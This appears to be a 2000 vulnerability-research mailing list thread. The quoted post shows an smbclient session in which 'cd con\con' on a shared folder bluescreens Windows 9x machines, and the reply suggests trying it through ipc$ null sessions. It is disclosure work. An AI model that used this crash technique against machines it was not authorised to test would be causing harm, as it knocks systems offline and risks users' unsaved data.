Re: Crashing Win9x with smbclient

[marc () EEYE COM (Marc)]

> From what I've seen the bluescreen con/con stuff is only happening if you
are able to connect to a share. So if you don't have access to a share you
can't make it bluescreen. So maybe it would be worth it to try con/con
related things against stuff like ipc$. so you don't even need access to a
share but just to do a null session connection. just a thought.

Signed,
Marc
eEye Digital Security
http://www.eEye.com

"It is the years that blind you. Searching so hard for success you lose
grasp on the basic wonders of being alive."
-chameleon

| -----Original Message-----
| From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Bud
| Meister
| Sent: Monday, March 13, 2000 2:52 PM
| To: VULN-DEV () SECURITYFOCUS COM
| Subject: Crashing Win9x with smbclient
|
|
| Hi everyone,
|
| I'm an assistant in a high school computer lab with about
| 25 Win9x workstations and a Linux server. All the stations
| have a shared "My Documents" directory, so students can
| save their work locally and still be able to access it from
| other workstations. The Linux server is really only there
| for my own personal use, not as a student fileserver
| (hence the shares).
|
| After reading the thread about the 'con\con' bug, I decided
| to do a little experimenting. Here's what I found
| (displayed information is skewed):
|
| --------------------
| [neo@neo ~]$ smbclient '\\station-1\my documents'
| Password:
|
| smb:\> ls
|   Sarah1.doc     358739857   48574
|   JoePic.jpg       7634733     873
|
| smb:\> cd con\con
| *disconnect*
|
| [neo@neo ~]$
| --------------------
|
| After I attempted the change directory command, Station-1 bluescreened
| immediately. I repeated this process on 5 other workstations, and all
| bluescreened; some were recoverable (but too unstable to continue without
| a reboot), but most had to be rebooted.
|
| This bug probably won't have any affect on our network, since we're
| running
| IP masquerading on our router and nothing can come in. The only way I've
| exploited it remotely is by using smbclient on a Windows machine (my
| Linux box is the only one in the school).
|
| As for larger effects, I couldn't say. That's why I mentioned it here :)
| I realize this is somewhat of an old problem, and this technique may
| have already been discovered, but I'm curious to see what others have
| to say on this topic.
|
|
| ----->Buddy
| budmeister1 () juno com
| http://tenbux.iwarp.com/
|
| ________________________________________________________________
| YOU'RE PAYING TOO MUCH FOR THE INTERNET!
| Juno now offers FREE Internet Access!
| Try it today - there's no risk!  For your FREE software, visit:
| http://dl.www.juno.com/get/tagj.
|